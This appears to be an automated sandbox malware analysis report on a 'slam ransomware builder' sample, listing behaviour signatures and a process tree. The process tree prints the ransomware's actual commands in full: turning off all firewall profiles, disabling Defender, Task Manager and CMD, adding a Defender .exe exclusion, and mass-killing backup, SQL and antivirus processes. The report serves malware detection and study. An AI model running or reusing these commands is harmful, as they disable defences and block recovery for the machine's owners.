Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
29/10/2022, 11:00
221029-m3y6bsdbc7 829/10/2022, 10:57
221029-m2eejadag4 129/10/2022, 10:23
221029-me9bdschhl 929/10/2022, 08:32
221029-kfcmpsaagk 929/10/2022, 08:07
221029-jz1yzagfa9 9Analysis
-
max time kernel
768s -
max time network
545s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
29/10/2022, 08:07
General
-
Target
http://we.tl/t-njAnKAfxKd
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 9 IoCs
-
Modifies Windows Firewall 1 TTPs 15 IoCs
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 10 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Drops desktop.ini file(s) 10 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 43 IoCs
-
Modifies registry key 1 TTPs 6 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 23 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge http://we.tl/t-njAnKAfxKd1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch http://we.tl/t-njAnKAfxKd1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe21646f8,0x7fffe2164708,0x7fffe21647182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5240 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5420 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8596 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1e0,0x22c,0x7ff637a15460,0x7ff637a15470,0x7ff637a154803⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8596 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6948 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6148 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8360 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14009120242742484887,12616115567331343329,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\slam ransomware builder installer.exe"C:\Users\Admin\Downloads\slam ransomware builder installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & taskkill /F /IM slam.exe & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM slam.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & exit3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start C:\slam_ransomware_builder\start.exe & exit3⤵
-
C:\slam_ransomware_builder\start.exeC:\slam_ransomware_builder\start.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\740D.tmp\start.bat" C:\slam_ransomware_builder\start.exe"5⤵
-
C:\slam_ransomware_builder\slam.exeslam.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpfbd8524bf1e64be5b5ec1d6c04e0b1c7.rsp"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF222.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCCB928722C5C14E3295E298DE94D8778.TMP"10⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9B.tmp" "c:\slam_ransomware_builder\CSC912991BC9E8B4CBCA9B634EC2527B892.TMP"9⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpc75e3bf481f7477e83f017795486f64d.rsp"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16FF.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCAD6034EC5BAA4C98906F32D6D8E33D6.TMP"10⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1980.tmp" "c:\slam_ransomware_builder\CSC60B9FCBBBAC94FB1881BFDF6D61CD73D.TMP"9⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpe1e08a2b73774d268cb522c0c54a1d93.rsp"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18B6.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCCE19B479D22A4779886AAAD76B7415EC.TMP"10⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CDC.tmp" "c:\slam_ransomware_builder\CSC800CDDC2720F4F01863F1BFC7A2F84CE.TMP"9⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM server_connect.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM server_connect.exe8⤵
-
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension .exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
